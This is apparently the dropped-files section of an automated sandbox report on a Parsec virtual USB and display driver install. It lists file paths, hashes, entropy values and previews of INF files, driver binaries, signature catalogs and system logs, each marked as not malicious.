                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                              C:\Windows\INF\setupapi.dev.log

                              Download File
                              Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                              File Type:Generic INItialization configuration [BeginLog]
                              Category:dropped
                              Size (bytes):72847
                              Entropy (8bit):5.017273388252833
                              Encrypted:false
                              SSDEEP:768:Own95cdyYloiwQ+a6WiM5XaWEgny/Epny7:O+5cdyeoiwQ+a6WiM5XaWEay/Edy7
                              MD5:EC5AA294254F6C1BF580DF1033F7FFD4
                              SHA1:A3D5016C697DB88A4459845405E64F1F5BF8090B
                              SHA-256:8FB9AD19F26952A1BC2F4D46F34E84F0FDEE9CE96D2FAF68EA28D75D457F89AC
                              SHA-512:4014E69A5A4C5E28366BA2C6A6FC9781FBE7C3E25168CAF79466FF4C4770423ADDEE2B6875CF0F4AF8D7FF768F47561157B074171A319058F91B7A387F62C45E
                              Malicious:false
                              Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:

                              C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE849.tmp

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                              C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE84A.tmp

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                              C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE85A.tmp

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                              C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.cat (copy)

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11858
                              Entropy (8bit):7.334407083811773
                              Encrypted:false
                              SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                              MD5:560EFA3FA6E5AB486D958B12207AC6ED
                              SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                              SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                              SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                              Malicious:false
                              Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                              C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.inf (copy)

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):1311
                              Entropy (8bit):5.255673591625164
                              Encrypted:false
                              SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                              MD5:AC423F3B285C615E7BEC73DC2FA71D20
                              SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                              SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                              SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                              Malicious:false
                              Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                              C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.sys (copy)

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):26680
                              Entropy (8bit):6.39482709996269
                              Encrypted:false
                              SSDEEP:384:OOq45ajAwai+E3n5bWbkcBnqRTjdfHpl1eUNh3YDX+iR9zYjI:O/45al/RcVw1Hf1zH3YDuO9zyI
                              MD5:0790B2E5B9D6B38B566C6BC796F0364A
                              SHA1:1C87512273F9E98E43EA1B048A67995A93E02B4E
                              SHA-256:4B98D337ED94646D10BDB0395A29D10DCAC50C660C5176C1937A823301BD6CA1
                              SHA-512:03A8E2BE9C98385EC13CDE7EE321AB73235289DE22DEB1029B795392B90A447DFA46182D40CBBC091B39AB0DF8F5A8E9FC7A80F1D839F36EC8C678BDF746844E
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"..C..C..C..;..C..C..C..;..C..C..C..;..C..;..C.....C...5..C.....C.Rich.C.........................PE..d...o..e.........."....&.&..........p..........@....................................[.....`A.................................................q..P............P.......@..8(......<...`5..8........................... 4..@............0...............................text............................... ..h.rdata.......0......................@..H.data........@.......&..............@....pdata.......P.......(..............@..HPAGE....l....`.......*.............. ..`INIT...."....p.......4.............. ..b.rsrc................:..............@..B.reloc..<............>..............@..B........................................................................................................................................................................

                              C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDE94.tmp

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                              C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEB4.tmp

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                              C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmp

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                              C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.cat (copy)

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12001
                              Entropy (8bit):7.346082125667387
                              Encrypted:false
                              SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                              MD5:CFE9C8FD6FAF915A653D39895D3D0862
                              SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                              SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                              SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                              Malicious:false
                              Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                              C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.inf (copy)

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:Windows setup INFormation
                              Category:dropped
                              Size (bytes):3005
                              Entropy (8bit):5.435819624452916
                              Encrypted:false
                              SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                              MD5:04F8C6A4C9D90818704596FFF273AD0E
                              SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                              SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                              SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                              Malicious:false
                              Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                              C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):263336
                              Entropy (8bit):6.416646624342821
                              Encrypted:false
                              SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                              MD5:591AB089C7184E33D0F4DB12B4CA5498
                              SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                              SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                              SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                              C:\Windows\System32\catroot2\dberr.txt

                              Download File
                              Process:C:\Windows\System32\drvinst.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:modified
                              Size (bytes):4477
                              Entropy (8bit):5.385745051115418
                              Encrypted:false
                              SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3hpTpbCpEpDk+psNVpsLim:QO00eO00erMwmkB1kAIrN4um
                              MD5:4672E4A8547BA549EB89E4A428A4423B
                              SHA1:B4EE0BA2B2E3B9C9AEFF73DE0624182C9340F9C8
                              SHA-256:8A8F89144AC14939FC2E62678C40A5F1DAA4C73626476A0D8BB017A903DD6FA1
                              SHA-512:2CA597C141311E0BBC20901C96FCCF53908AA23F9BF65D9A93A42C6C52D137A85EFB638F82E4B79CCAB0F0755DD37521B81227DC5724E3FE6C368DB344B5B10F
                              Malicious:false
                              Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta

                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                              Download File
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):471
                              Entropy (8bit):7.2391775057961
                              Encrypted:false
                              SSDEEP:12:JyYOY5GLsHxIDJhfxyGFFROABVkhS/m7dUM:JROYILsIfLFFo2VOMm7df
                              MD5:DE60388F3921FE0CD4272D7FC99A4BD9
                              SHA1:4726073B006C9B54CDCB378212DEE2CDD4BD622B
                              SHA-256:9E8579E6133A72D13A0704175FB50353BEF2876E04E0B510D32791E47AC94C31
                              SHA-512:84325EFE7125E5C12ADBFB5EDD96147E3211C8128E02183EFFA7DB9C52255F8CE1FF20EAE5EB50E999CB4A8528EA3F8B4FB09E5FE85478559688C1B208691E0C
                              Malicious:false
                              Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20241112190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20241112190516Z....20241119190516Z0...*.H.............lN.u.GpZc..$.rA.H.2..R...w.....y|{|5...W..? x.i..t...~.t.:j..vf^P94.a-.3K..+[......6..jU..l.Q..i.a.T......y....&H .h...9.4T.4.......U.X.9....L...{=Us....1>.w..f@..%....X=M..Z.....9/:.z.....w_iH;./.@........(u.zI........h.B....+.'a...l.)1B.0.V.

                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426

                              Download File
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):727
                              Entropy (8bit):7.559119648888612
                              Encrypted:false
